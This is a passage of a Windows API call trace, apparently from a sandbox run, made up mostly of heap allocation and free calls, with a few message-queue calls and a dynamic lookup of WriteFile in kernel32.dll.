out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0185.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0185.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0185.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0185.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0185.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0185.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0185.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0185.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0185.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0185.790] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0185.790] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0185.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0185.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0185.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b50 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0185.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0185.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0185.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0185.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0185.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0185.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0185.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1c8 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0185.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0185.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0185.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0185.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0185.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0185.792] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0185.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0185.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0185.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0185.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0185.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0185.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0185.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0185.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0185.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0185.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0185.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0185.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0185.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0185.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0185.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0185.794] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0185.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0185.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0185.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0185.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0185.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0185.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0185.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0185.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0185.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0185.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0185.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0185.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0185.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0185.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0185.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0185.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0185.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0185.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0185.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0185.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0185.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0185.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0185.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0185.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0185.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0185.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0185.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.796] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0185.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba288, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0185.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0185.796] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0185.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: 